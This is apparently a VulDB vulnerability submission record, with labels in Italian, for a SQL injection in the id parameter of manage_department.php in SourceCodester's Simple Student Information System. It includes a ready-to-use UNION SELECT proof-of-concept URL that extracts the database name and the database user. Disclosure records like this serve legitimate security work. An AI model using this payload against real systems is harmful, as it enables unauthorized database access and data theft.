| Titolo | SourceCodester Simple Student Information System manage_department.php SQL Injection |
|---|
| Descrizione | A vulnerability was found in Simple Student Information System admin/departments/manage_department.php released by SourceCodester,
The manipulation of the argument id leads to SQL Injection.
It is possible to initiate the attack remotely.
http://192.168.1.8/sis/admin/departments/manage_department.php?id=-5756%27%20UNION%20ALL%20SELECT%20NULL,database(),user(),NULL,NULL,NULL,NULL--%20- |
|---|
| Fonte | ⚠️ https://bewhale.github.io/post/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E2%80%94Simple%20Student%20Information%20System/ |
|---|
| Utente | bewhale (UID 30640) |
|---|
| Sottomissione | 07/08/2022 21:34 (4 anni fa) |
|---|
| Moderazione | 07/08/2022 21:49 (15 minutes later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 205829 [SourceCodester Simple Student Information System manage_department.php ID iniezione SQL] |
|---|
| Punti | 20 |
|---|